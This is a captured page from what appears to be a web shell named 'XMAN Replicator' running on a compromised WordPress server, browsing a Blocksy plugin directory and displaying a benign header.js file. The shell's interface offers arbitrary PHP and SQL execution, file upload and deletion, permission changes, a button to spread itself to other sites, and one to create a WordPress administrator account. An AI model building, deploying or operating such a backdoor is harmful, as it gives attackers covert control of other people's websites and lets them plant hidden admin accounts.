🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
rs
/
wp-content
/
plugins
/
blocksy-companion
/
static
/
js
/
sync
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2023-10-14 14:54
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2023-10-14 14:54
🔄
🗑️
🗑️📁
⬇️
🔒
header.js
2,220 B
-rw-r--r--
2023-10-14 14:54
✏️
🔄
🗑️
⬇️
🔒
View: header.js
import ctEvents from 'ct-events' import { withKeys } from 'blocksy-customizer-sync' ctEvents.on( 'ct:header:sync:collect-variable-descriptors', (variableDescriptors) => { variableDescriptors['global'] = ({ itemId }) => ({ transparent_behaviour: { selector: `[data-header*="${document.body.dataset.header}"]`, variable: 'has-transparent-header', responsive: true, extractValue: (value) => ({ desktop: value.desktop ? 'var(--true)' : 'var(--false)', tablet: value.mobile ? 'var(--true)' : 'var(--false)', mobile: value.mobile ? 'var(--true)' : 'var(--false)', }), unit: '', }, }) } ) ctEvents.on( 'ct:header:sync:item:global', ({ optionId, optionValue, values }) => { if ( optionId === 'has_sticky_header' || optionId === 'sticky_rows' || optionId === 'sticky_behaviour' ) { const { has_sticky_header, sticky_rows, sticky_behaviour } = values Array.from(document.querySelectorAll('[data-sticky]')).map( (row) => { row.removeAttribute('data-sticky') } ) if (has_sticky_header === 'yes') { Array.from(document.querySelectorAll('[data-row]')).map( (row) => { let rowType = row.dataset.row if (!sticky_rows[rowType]) { return } let stickyResult = [] if (sticky_behaviour.desktop) { stickyResult.push('desktop') } if (sticky_behaviour.mobile) { stickyResult.push('mobile') } row.dataset.sticky = stickyResult.join(':') } ) } ctEvents.trigger('blocksy:frontend:init') } if (optionId === 'transparent_behaviour') { if (!document.querySelector('[data-transparent]')) { return } Array.from(document.querySelectorAll('[data-device]')).map( (device) => { device.removeAttribute('data-transparent') Array.from( device.querySelectorAll('[data-row]') ).map((el) => el.removeAttribute('data-transparent-row')) if (optionValue[device.dataset.device]) { device.dataset.transparent = '' Array.from(device.querySelectorAll('[data-row]')).map( (el) => (el.dataset.transparentRow = 'yes') ) } ctEvents.trigger('blocksy:frontend:init') } ) } } )
PHP Console
Execute
SQL Console
Execute